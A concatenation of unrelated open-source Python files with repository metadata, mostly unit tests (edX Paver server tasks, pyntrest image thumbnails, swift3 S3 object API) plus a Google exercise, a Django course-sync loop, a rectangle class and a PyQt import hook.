# An alternate approach uses pop(-1) to remove the endmost elements
# from each list, building a solution list which is backwards.
# Then use reversed() to put the result back in the correct order. That
# solution works in linear time, but is more ugly.
# Simple provided test() function used in main() to print
# what each function returns vs. what it's supposed to return.
def test(got, expected):
if got == expected:
prefix = ' OK '
else:
prefix = ' X '
print('%s got: %s expected: %s' % (prefix, repr(got), repr(expected)))
# Calls the above functions with interesting inputs.
def main():
print('remove_adjacent')
test(remove_adjacent([1, 2, 2, 3]), [1, 2, 3])
test(remove_adjacent([2, 2, 3, 3, 3]), [2, 3])
test(remove_adjacent([]), [])
print()
print('linear_merge')
test(linear_merge(['aa', 'xx', 'zz'], ['bb', 'cc']),
['aa', 'bb', 'cc', 'xx', 'zz'])
test(linear_merge(['aa', 'xx'], ['bb', 'cc', 'zz']),
['aa', 'bb', 'cc', 'xx', 'zz'])
test(linear_merge(['aa', 'aa'], ['aa', 'bb', 'bb']),
['aa', 'aa', 'aa', 'bb', 'bb'])
if __name__ == '__main__':
main()
|
plumps/google-python-exercises
|
basic/list2.py
|
Python
|
apache-2.0
| 2,165
|
"""Unit tests for the Paver server tasks."""
import ddt
from paver.easy import call_task
from .utils import PaverTestCase
EXPECTED_COFFEE_COMMAND = (
u"node_modules/.bin/coffee --compile `find {platform_root}/lms "
u"{platform_root}/cms {platform_root}/common -type f -name \"*.coffee\"`"
)
EXPECTED_SASS_COMMAND = (
u"libsass {sass_directory}"
)
EXPECTED_COMMON_SASS_DIRECTORIES = [
u"common/static/sass",
]
EXPECTED_LMS_SASS_DIRECTORIES = [
u"lms/static/sass",
u"lms/static/themed_sass",
u"lms/static/certificates/sass",
]
EXPECTED_CMS_SASS_DIRECTORIES = [
u"cms/static/sass",
]
EXPECTED_PREPROCESS_ASSETS_COMMAND = (
u"python manage.py {system} --settings={asset_settings} preprocess_assets"
u" {system}/static/sass/*.scss {system}/static/themed_sass"
)
EXPECTED_COLLECT_STATIC_COMMAND = (
u"python manage.py {system} --settings={asset_settings} collectstatic --noinput > /dev/null"
)
EXPECTED_CELERY_COMMAND = (
u"python manage.py lms --settings={settings} celery worker --beat --loglevel=INFO --pythonpath=."
)
EXPECTED_RUN_SERVER_COMMAND = (
u"python manage.py {system} --settings={settings} runserver --traceback --pythonpath=. 0.0.0.0:{port}"
)
EXPECTED_INDEX_COURSE_COMMAND = (
u"python manage.py {system} --settings={settings} reindex_course --setup"
)
@ddt.ddt
class TestPaverServerTasks(PaverTestCase):
"""
Test the Paver server tasks.
"""
@ddt.data(
[{}],
[{"settings": "aws"}],
[{"asset-settings": "test_static_optimized"}],
[{"settings": "devstack_optimized", "asset-settings": "test_static_optimized"}],
[{"fast": True}],
[{"port": 8030}],
)
@ddt.unpack
def test_lms(self, options):
"""
Test the "devstack" task.
"""
self.verify_server_task("lms", options)
@ddt.data(
[{}],
[{"settings": "aws"}],
[{"asset-settings": "test_static_optimized"}],
[{"settings": "devstack_optimized", "asset-settings": "test_static_optimized"}],
[{"fast": True}],
[{"port": 8031}],
)
@ddt.unpack
def test_studio(self, options):
"""
Test the "devstack" task.
"""
self.verify_server_task("studio", options)
@ddt.data(
[{}],
[{"settings": "aws"}],
[{"asset-settings": "test_static_optimized"}],
[{"settings": "devstack_optimized", "asset-settings": "test_static_optimized"}],
[{"fast": True}],
[{"optimized": True}],
[{"optimized": True, "fast": True}],
[{"no-contracts": True}],
)
@ddt.unpack
def test_devstack(self, server_options):
"""
Test the "devstack" task.
"""
options = server_options.copy()
is_optimized = options.get("optimized", False)
expected_settings = "devstack_optimized" if is_optimized else options.get("settings", "devstack")
# First test with LMS
options["system"] = "lms"
options["expected_messages"] = [
EXPECTED_INDEX_COURSE_COMMAND.format(
system="cms",
settings=expected_settings,
)
]
self.verify_server_task("devstack", options, contracts_default=True)
# Then test with Studio
options["system"] = "cms"
options["expected_messages"] = [
EXPECTED_INDEX_COURSE_COMMAND.format(
system="cms",
settings=expected_settings,
)
]
self.verify_server_task("devstack", options, contracts_default=True)
@ddt.data(
[{}],
[{"settings": "aws"}],
[{"asset_settings": "test_static_optimized"}],
[{"settings": "devstack_optimized", "asset-settings": "test_static_optimized"}],
[{"fast": True}],
[{"optimized": True}],
[{"optimized": True, "fast": True}],
)
@ddt.unpack
def test_run_all_servers(self, options):
"""
Test the "run_all_servers" task.
"""
self.verify_run_all_servers_task(options)
@ddt.data(
[{}],
[{"settings": "aws"}],
)
@ddt.unpack
def test_celery(self, options):
"""
Test the "celery" task.
"""
settings = options.get("settings", "dev_with_worker")
call_task("pavelib.servers.celery", options=options)
self.assertEquals(self.task_messages, [EXPECTED_CELERY_COMMAND.format(settings=settings)])
@ddt.data(
[{}],
[{"settings": "aws"}],
)
@ddt.unpack
def test_update_db(self, options):
"""
Test the "update_db" task.
"""
settings = options.get("settings", "devstack")
call_task("pavelib.servers.update_db", options=options)
db_command = "python manage.py {server} --settings={settings} migrate --traceback --pythonpath=."
self.assertEquals(
self.task_messages,
[
db_command.format(server="lms", settings=settings),
db_command.format(server="cms", settings=settings),
]
)
@ddt.data(
["lms", {}],
["lms", {"settings": "aws"}],
["cms", {}],
["cms", {"settings": "aws"}],
)
@ddt.unpack
def test_check_settings(self, system, options):
"""
Test the "check_settings" task.
"""
settings = options.get("settings", "devstack")
call_task("pavelib.servers.check_settings", args=[system, settings])
self.assertEquals(
self.task_messages,
[
"echo 'import {system}.envs.{settings}' "
"| python manage.py {system} --settings={settings} shell --plain --pythonpath=.".format(
system=system, settings=settings
),
]
)
def verify_server_task(self, task_name, options, contracts_default=False):
"""
Verify the output of a server task.
"""
settings = options.get("settings", None)
asset_settings = options.get("asset-settings", None)
is_optimized = options.get("optimized", False)
is_fast = options.get("fast", False)
no_contracts = options.get("no-contracts", not contracts_default)
if task_name == "devstack":
system = options.get("system")
elif task_name == "studio":
system = "cms"
else:
system = "lms"
port = options.get("port", "8000" if system == "lms" else "8001")
self.reset_task_messages()
if task_name == "devstack":
args = ["studio" if system == "cms" else system]
if settings:
args.append("--settings={settings}".format(settings=settings))
if asset_settings:
args.append("--asset-settings={asset_settings}".format(asset_settings=asset_settings))
if is_optimized:
args.append("--optimized")
if is_fast:
args.append("--fast")
if no_contracts:
args.append("--no-contracts")
call_task("pavelib.servers.devstack", args=args)
else:
call_task("pavelib.servers.{task_name}".format(task_name=task_name), options=options)
expected_messages = options.get("expected_messages", [])
expected_settings = settings if settings else "devstack"
expected_asset_settings = asset_settings if asset_settings else expected_settings
if is_optimized:
expected_settings = "devstack_optimized"
expected_asset_settings = "test_static_optimized"
expected_collect_static = not is_fast and expected_settings != "devstack"
if not is_fast:
expected_messages.append(EXPECTED_PREPROCESS_ASSETS_COMMAND.format(
system=system, asset_settings=expected_asset_settings
))
expected_messages.append(u"xmodule_assets common/static/xmodule")
expected_messages.append(u"install npm_assets")
expected_messages.append(EXPECTED_COFFEE_COMMAND.format(platform_root=self.platform_root))
expected_messages.extend(self.expected_sass_commands(system=system))
if expected_collect_static:
expected_messages.append(EXPECTED_COLLECT_STATIC_COMMAND.format(
system=system, asset_settings=expected_asset_settings
))
expected_run_server_command = EXPECTED_RUN_SERVER_COMMAND.format(
system=system,
settings=expected_settings,
port=port,
)
if not no_contracts:
expected_run_server_command += " --contracts"
expected_messages.append(expected_run_server_command)
self.assertEquals(self.task_messages, expected_messages)
def verify_run_all_servers_task(self, options):
"""
Verify the output of a server task.
"""
settings = options.get("settings", None)
asset_settings = options.get("asset_settings", None)
is_optimized = options.get("optimized", False)
is_fast = options.get("fast", False)
self.reset_task_messages()
call_task("pavelib.servers.run_all_servers", options=options)
expected_settings = settings if settings else "devstack"
expected_asset_settings = asset_settings if asset_settings else expected_settings
if is_optimized:
expected_settings = "devstack_optimized"
expected_asset_settings = "test_static_optimized"
expected_collect_static = not is_fast and expected_settings != "devstack"
expected_messages = []
if not is_fast:
expected_messages.append(EXPECTED_PREPROCESS_ASSETS_COMMAND.format(
system="lms", asset_settings=expected_asset_settings
))
expected_messages.append(EXPECTED_PREPROCESS_ASSETS_COMMAND.format(
system="cms", asset_settings=expected_asset_settings
))
expected_messages.append(u"xmodule_assets common/static/xmodule")
expected_messages.append(u"install npm_assets")
expected_messages.append(EXPECTED_COFFEE_COMMAND.format(platform_root=self.platform_root))
expected_messages.extend(self.expected_sass_commands())
if expected_collect_static:
expected_messages.append(EXPECTED_COLLECT_STATIC_COMMAND.format(
system="lms", asset_settings=expected_asset_settings
))
expected_messages.append(EXPECTED_COLLECT_STATIC_COMMAND.format(
system="cms", asset_settings=expected_asset_settings
))
expected_messages.append(
EXPECTED_RUN_SERVER_COMMAND.format(
system="lms",
settings=expected_settings,
port=8000,
)
)
expected_messages.append(
EXPECTED_RUN_SERVER_COMMAND.format(
system="cms",
settings=expected_settings,
port=8001,
)
)
expected_messages.append(EXPECTED_CELERY_COMMAND.format(settings="dev_with_worker"))
self.assertEquals(self.task_messages, expected_messages)
def expected_sass_commands(self, system=None):
"""
Returns the expected SASS commands for the specified system.
"""
expected_sass_directories = []
expected_sass_directories.extend(EXPECTED_COMMON_SASS_DIRECTORIES)
if system != 'cms':
expected_sass_directories.extend(EXPECTED_LMS_SASS_DIRECTORIES)
if system != 'lms':
expected_sass_directories.extend(EXPECTED_CMS_SASS_DIRECTORIES)
return [EXPECTED_SASS_COMMAND.format(sass_directory=directory) for directory in expected_sass_directories]
|
devs1991/test_edx_docmode
|
pavelib/paver_tests/test_servers.py
|
Python
|
agpl-3.0
| 11,855
|
import sys
import os
import traceback
from django import db
sys.path.append('/root/wisely/wisely_project/')
os.environ['DJANGO_SETTINGS_MODULE'] = 'wisely_project.settings.production'
from django.db.models import F, Q
from django.utils import timezone
from users.tasks import get_coursera_courses, get_edx_courses, get_udemy_courses
__author__ = 'tmehta'
from users.models import CourseraProfile, EdxProfile, UdemyProfile
while True:
try:
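        # Presumably a memory guard: with DEBUG enabled, Django records every
        # executed query on each connection, so the log is cleared once it
        # grows past 100 entries.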
for connection in db.connections.all():
if len(connection.queries) > 100:
db.reset_queries()
for user in CourseraProfile.objects.filter(last_updated__lt=F('user__last_login')).filter(~Q(username='')).filter(
incorrect_login=False):
print user.username
print "Start coursera"
get_coursera_courses(user)
user.last_updated = timezone.now()
print "Done Coursera"
user.save()
for user in EdxProfile.objects.filter(last_updated__lt=F('user__last_login')).filter(~Q(email='')).filter(
incorrect_login=False):
print user.email
print "Start edx"
get_edx_courses(user)
print "Done EDx"
user.last_updated = timezone.now()
user.save()
for user in UdemyProfile.objects.filter(last_updated__lt=F('user__last_login')).filter(~Q(email='')).filter(
incorrect_login=False):
print user.email
print "Start udemy"
get_udemy_courses(user)
print "Done Udemy"
user.last_updated = timezone.now()
user.save()
except Exception as e:
print traceback.format_exc()
|
TejasM/wisely
|
wisely_project/get_courses_file.py
|
Python
|
mit
| 1,721
|
__author__ = 'Yuvv'
class MyRect(object):
"""my rect object, which sames as pygame.rect.Rect,
but its value is float.
"""
def __init__(self, x, y, w, h):
self.x = x
self.y = y
self.w = w
self.h = h
@property
def top(self):
return self.y
@property
def bottom(self):
return self.y + self.h
@property
def left(self):
return self.x
@property
def right(self):
return self.x + self.w
@property
def pos(self):
return self.x, self.y
@property
def center(self):
return self.x + self.w / 2, self.y + self.h / 2
def move(self, direction):
self.x += direction[0]
self.y += direction[1]
def move_center(self, direction):
self.x += direction[0] - self.w / 2
self.y += direction[1] - self.h / 2
def move_horizontal(self, dx):
self.x += dx
def move_vertical(self, dy):
self.y += dy
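# A minimal usage sketch (illustrative, not part of the original module):
#   r = MyRect(0.0, 0.0, 4.0, 2.0)
#   r.move((1.5, 0.5))   # r.pos is now (1.5, 0.5)
#   print(r.center)      # -> (3.5, 1.5)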
|
Yuvv/LearnTestDemoTempMini
|
py-pygame/Plain/util.py
|
Python
|
mit
| 987
|
"""Test suite for module pyntrest_pil"""
from PIL import Image
from os import path, remove
import unittest
from pyntrest.pyntrest_pil import PILHandler
class PilTestSuite(unittest.TestCase):
base_path = path.abspath(path.dirname(__file__))
def test_rescale_image_dimensions_to_desired_width (self):
pil = PILHandler ( 300, 150, 1.75 )
self.assertRaises(TypeError, pil.rescale_image_dimensions_to_desired_width)
self.assertRaises(TypeError, pil.rescale_image_dimensions_to_desired_width, None)
self.assertRaises(TypeError, pil.rescale_image_dimensions_to_desired_width, None, None)
self.assertRaises(TypeError, pil.rescale_image_dimensions_to_desired_width, None, None, None)
self.assertRaises(TypeError, pil.rescale_image_dimensions_to_desired_width, None, None, None, None)
a, b, c, d = pil.rescale_image_dimensions_to_desired_width(500, 400, 200, 1)
self.assertEqual(200, a)
self.assertEqual(160, b)
self.assertEqual(200, c)
self.assertEqual(160, d)
a, b, c, d = pil.rescale_image_dimensions_to_desired_width(500, 400, 200, 2)
self.assertEqual(200, a)
self.assertEqual(160, b)
self.assertEqual(400, c)
self.assertEqual(320, d)
def test_create_image_thumbnail_if_not_present ( self ):
pil = PILHandler ( 300, 150, 1.75 )
self.assertRaises(TypeError, pil.create_image_thumbnail_if_not_present)
self.assertRaises(TypeError, pil.create_image_thumbnail_if_not_present, None)
self.assertRaises(TypeError, pil.create_image_thumbnail_if_not_present, None, None)
self.assertRaises(TypeError, pil.create_image_thumbnail_if_not_present,
'/somewhere/foo.jpg', '/somewhere/foo2.jpg')
source_file = path.join ( self.base_path, 'testdata', 'image.jpg')
target_file = path.join ( self.base_path, 'testdata', 'image-trg.jpg')
self.addCleanup(remove, target_file)
width, height = pil.create_image_thumbnail_if_not_present(source_file, target_file)
self.assertTrue(path.exists(target_file))
self.assertEqual(300, width)
self.assertEqual(199, height)
im = Image.open(target_file)
self.assertEqual((525, 348), im.size)
def test_create_album_thumbnail_if_not_present ( self ):
pil = PILHandler ( 300, 150, 1.75 )
self.assertRaises(TypeError, pil.create_album_thumbnail_if_not_present)
self.assertRaises(TypeError, pil.create_album_thumbnail_if_not_present, None)
self.assertRaises(TypeError, pil.create_album_thumbnail_if_not_present, None, None)
self.assertRaises(TypeError, pil.create_album_thumbnail_if_not_present,
'/somewhere/foo.jpg', '/somewhere/foo2.jpg')
source_file = path.join ( self.base_path, 'testdata', 'image.jpg')
target_file = path.join ( self.base_path, 'testdata', 'album-trg.jpg')
self.addCleanup(remove, target_file)
width, height = pil.create_album_thumbnail_if_not_present(source_file, target_file)
self.assertTrue(path.exists(target_file))
self.assertEqual(300, width)
self.assertEqual(150, height)
im = Image.open(target_file)
self.assertEqual((525, 262), im.size)
def test_get_geo_coordinates (self ):
pil = PILHandler ( 300, 150, 1.75 )
self.assertRaises(TypeError, pil.get_geo_coordinates)
self.assertRaises(TypeError, pil.get_geo_coordinates, None)
self.assertRaises(TypeError, pil.get_geo_coordinates,
'/somewhere/foo.jpg')
source_file = path.join ( self.base_path, 'testdata', 'im-geo.jpg')
lat, lon = pil.get_geo_coordinates(source_file)
self.assertEqual(52.51611111111111, lat)
self.assertEqual(13.375, lon)
if __name__ == '__main__':
unittest.main()
|
BastiTee/pyntrest
|
pyntrest_tests/test_pyntrest_pil.py
|
Python
|
gpl-3.0
| 4,056
|
"""
This package a pyqt distutils hook to replace PyQt5 by our own (
qregexeditor.qt).
"""
def fix_qt_imports(path):
with open(path, 'r') as f_script:
lines = f_script.read().splitlines()
new_lines = []
for l in lines:
if l.startswith("import "):
l = "from . " + l
if "from PyQt5 import" in l:
l = l.replace("from PyQt5 import", "from qregexeditor.qt import")
new_lines.append(l)
with open(path, 'w') as f_script:
f_script.write("\n".join(new_lines))
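# For illustration, a line such as
#     from PyQt5 import QtCore
# is rewritten to
#     from qregexeditor.qt import QtCore
# while a bare 'import foo' becomes the relative 'from . import foo'.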
|
ColinDuquesnoy/QRegexEditor
|
qregexeditor/_hooks.py
|
Python
|
mit
| 533
|
# Copyright (c) 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from datetime import datetime
import hashlib
import os
from os.path import join
import time
from mock import patch
from swift.common import swob
from swift.common.swob import Request
from swift3.test.unit import Swift3TestCase
from swift3.test.unit.test_s3_acl import s3acl
from swift3.subresource import ACL, User, encode_acl, Owner, Grant
from swift3.etree import fromstring
from swift3.utils import mktime, S3Timestamp
from swift3.test.unit.helpers import FakeSwift
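# The wrapper below augments the fake auth middleware for keystone-style
# tests: it splits an 'AWS tenant:user:signature' Authorization header and
# exposes the tenant and user names via HTTP_X_TENANT_NAME / HTTP_X_USER_NAME,
# unless an auth override is already set in the environ.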
def _wrap_fake_auth_middleware(org_func):
def fake_fake_auth_middleware(self, env):
org_func(env)
if 'swift.authorize_override' in env:
return
if 'HTTP_AUTHORIZATION' not in env:
return
_, authorization = env['HTTP_AUTHORIZATION'].split(' ')
tenant_user, sign = authorization.rsplit(':', 1)
tenant, user = tenant_user.rsplit(':', 1)
env['HTTP_X_TENANT_NAME'] = tenant
env['HTTP_X_USER_NAME'] = user
return fake_fake_auth_middleware
class TestSwift3Obj(Swift3TestCase):
def setUp(self):
super(TestSwift3Obj, self).setUp()
self.object_body = 'hello'
self.etag = hashlib.md5(self.object_body).hexdigest()
self.last_modified = 'Fri, 01 Apr 2014 12:00:00 GMT'
self.response_headers = {'Content-Type': 'text/html',
'Content-Length': len(self.object_body),
'Content-Disposition': 'inline',
'Content-Language': 'en',
'x-object-meta-test': 'swift',
'etag': self.etag,
'last-modified': self.last_modified,
'expires': 'Mon, 21 Sep 2015 12:00:00 GMT',
'x-robots-tag': 'nofollow',
'cache-control': 'private'}
self.swift.register('GET', '/v1/AUTH_test/bucket/object',
swob.HTTPOk, self.response_headers,
self.object_body)
self.swift.register('PUT', '/v1/AUTH_test/bucket/object',
swob.HTTPCreated,
{'etag': self.etag,
'last-modified': self.last_modified,
'x-object-meta-something': 'oh hai'},
None)
def _test_object_GETorHEAD(self, method):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': method},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '200')
unexpected_headers = []
for key, val in self.response_headers.iteritems():
if key in ('Content-Length', 'Content-Type', 'content-encoding',
'last-modified', 'cache-control', 'Content-Disposition',
'Content-Language', 'expires', 'x-robots-tag'):
self.assertIn(key, headers)
self.assertEqual(headers[key], str(val))
elif key == 'etag':
self.assertEqual(headers[key], '"%s"' % val)
elif key.startswith('x-object-meta-'):
self.assertIn('x-amz-meta-' + key[14:], headers)
self.assertEqual(headers['x-amz-meta-' + key[14:]], val)
else:
unexpected_headers.append((key, val))
if unexpected_headers:
self.fail('unexpected headers: %r' % unexpected_headers)
self.assertEqual(headers['etag'],
'"%s"' % self.response_headers['etag'])
if method == 'GET':
self.assertEqual(body, self.object_body)
@s3acl
def test_object_HEAD_error(self):
        # Per the REST API specification, HEAD does not return a body even
        # for an error response, so only the response code is checked when
        # testing HEAD errors.
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPUnauthorized, {}, None)
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '403')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPForbidden, {}, None)
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '403')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPNotFound, {}, None)
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '404')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPPreconditionFailed, {}, None)
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '412')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPServerError, {}, None)
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '500')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPServiceUnavailable, {}, None)
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '500')
self.assertEqual(body, '') # sanity
def test_object_HEAD(self):
self._test_object_GETorHEAD('HEAD')
def _test_object_HEAD_Range(self, range_value):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Range': range_value,
'Date': self.get_date_header()})
return self.call_swift3(req)
@s3acl
def test_object_HEAD_Range_with_invalid_value(self):
range_value = ''
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'hoge'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes='
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes=1'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes=5-1'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '5')
self.assertTrue('content-range' not in headers)
range_value = 'bytes=5-10'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '416')
@s3acl
def test_object_HEAD_Range(self):
# update response headers
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPOk, self.response_headers,
self.object_body)
range_value = 'bytes=0-3'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '4')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 0-3'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
range_value = 'bytes=3-3'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '1')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 3-3'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
range_value = 'bytes=1-'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '4')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 1-4'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
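        # 'bytes=-3' is a suffix range: it asks for the last three bytes of
        # the five-byte body, i.e. offsets 2-4, hence 'bytes 2-4' below.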
range_value = 'bytes=-3'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '3')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 2-4'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
@s3acl
def test_object_GET_error(self):
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPUnauthorized)
self.assertEqual(code, 'SignatureDoesNotMatch')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPForbidden)
self.assertEqual(code, 'AccessDenied')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchKey')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPServerError)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPPreconditionFailed)
self.assertEqual(code, 'PreconditionFailed')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPServiceUnavailable)
self.assertEqual(code, 'InternalError')
@s3acl
def test_object_GET(self):
self._test_object_GETorHEAD('GET')
@s3acl(s3acl_only=True)
def test_object_GET_with_s3acl_and_keystone(self):
        # patch the fake auth middleware so keystone-style authentication passes
fake_auth = self.swift._fake_auth_middleware
with patch.object(FakeSwift, '_fake_auth_middleware',
_wrap_fake_auth_middleware(fake_auth)):
self._test_object_GETorHEAD('GET')
_, _, headers = self.swift.calls_with_headers[-1]
self.assertNotIn('Authorization', headers)
_, _, headers = self.swift.calls_with_headers[0]
self.assertNotIn('Authorization', headers)
@s3acl
def test_object_GET_Range(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'GET'},
headers={'Authorization': 'AWS test:tester:hmac',
'Range': 'bytes=0-3',
'Date': self.get_date_header()})
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 0-3'))
@s3acl
def test_object_GET_Range_error(self):
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPRequestedRangeNotSatisfiable)
self.assertEqual(code, 'InvalidRange')
@s3acl
def test_object_GET_Response(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'GET',
'QUERY_STRING':
'response-content-type=%s&'
'response-content-language=%s&'
'response-expires=%s&'
'response-cache-control=%s&'
'response-content-disposition=%s&'
'response-content-encoding=%s&'
% ('text/plain', 'en',
'Fri, 01 Apr 2014 12:00:00 GMT',
'no-cache',
'attachment',
'gzip')},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_swift3(req)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-type' in headers)
self.assertEqual(headers['content-type'], 'text/plain')
self.assertTrue('content-language' in headers)
self.assertEqual(headers['content-language'], 'en')
self.assertTrue('expires' in headers)
self.assertEqual(headers['expires'], 'Fri, 01 Apr 2014 12:00:00 GMT')
self.assertTrue('cache-control' in headers)
self.assertEqual(headers['cache-control'], 'no-cache')
self.assertTrue('content-disposition' in headers)
self.assertEqual(headers['content-disposition'],
'attachment')
self.assertTrue('content-encoding' in headers)
self.assertEqual(headers['content-encoding'], 'gzip')
@s3acl
def test_object_PUT_error(self):
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPUnauthorized)
self.assertEqual(code, 'SignatureDoesNotMatch')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPForbidden)
self.assertEqual(code, 'AccessDenied')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchBucket')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPRequestEntityTooLarge)
self.assertEqual(code, 'EntityTooLarge')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPServerError)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPUnprocessableEntity)
self.assertEqual(code, 'BadDigest')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPLengthRequired)
self.assertEqual(code, 'MissingContentLength')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPPreconditionFailed)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPServiceUnavailable)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': ''})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?foo=bar'})
self.assertEqual(code, 'InvalidArgument')
        # adding other query parameters will cause an error
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?versionId=foo&bar=baz'})
self.assertEqual(code, 'InvalidArgument')
